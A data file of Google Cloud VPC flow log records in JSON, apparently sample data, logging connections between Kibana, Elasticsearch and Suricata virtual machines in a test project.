+{"insertId":"bnj3cofh3cdk8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":52260,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkp","jsonPayload":{"bytes_sent":"65069","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkc","jsonPayload":{"bytes_sent":"60530","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"366","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkm","jsonPayload":{"bytes_sent":"11384","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"86","reporter":"DEST","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdjy","jsonPayload":{"bytes_sent":"272063","connection":{"dest_ip":"67.43.156.13","dest_port":33554,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"247","reporter":"SRC","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdjv","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"67.43.156.13","dest_port":53706,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"SRC","rtt_msec":"43","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkh","jsonPayload":{"bytes_sent":"18295","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789039435Z","packets_sent":"118","reporter":"DEST","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkg","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":33064},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk7","jsonPayload":{"bytes_sent":"165290","connection":{"dest_ip":"10.87.40.76","dest_port":33556,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"251","reporter":"DEST","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":53706},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"DEST","rtt_msec":"43","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":52260},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdki","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34090,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkd","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34178,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdjw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.14","dest_port":33064,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk3","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":34906},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkb","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":58216,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk4","jsonPayload":{"bytes_sent":"60222","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"361","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkf","jsonPayload":{"bytes_sent":"61810","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"358","reporter":"SRC","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkl","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":58216},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk2","jsonPayload":{"bytes_sent":"136558","connection":{"dest_ip":"10.87.40.76","dest_port":33510,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"243","reporter":"DEST","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdko","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.14","dest_port":34906,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdke","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":52454,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdka","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34090},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkn","jsonPayload":{"bytes_sent":"170396","connection":{"dest_ip":"10.87.40.76","dest_port":33530,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk5","jsonPayload":{"bytes_sent":"171610","connection":{"dest_ip":"67.43.156.13","dest_port":33570,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"71","reporter":"SRC","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk6","jsonPayload":{"bytes_sent":"15186","connection":{"dest_ip":"67.43.156.13","dest_port":33858,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933164456Z","packets_sent":"75","reporter":"SRC","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"y4wffpfk2ero3","jsonPayload":{"bytes_sent":"208416","connection":{"dest_ip":"67.43.156.13","dest_port":33590,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"249","reporter":"SRC","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroh","jsonPayload":{"bytes_sent":"90977","connection":{"dest_ip":"192.168.2.177","dest_port":60108,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"357","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erom","jsonPayload":{"bytes_sent":"187301","connection":{"dest_ip":"67.43.156.13","dest_port":33536,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"242","reporter":"SRC","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 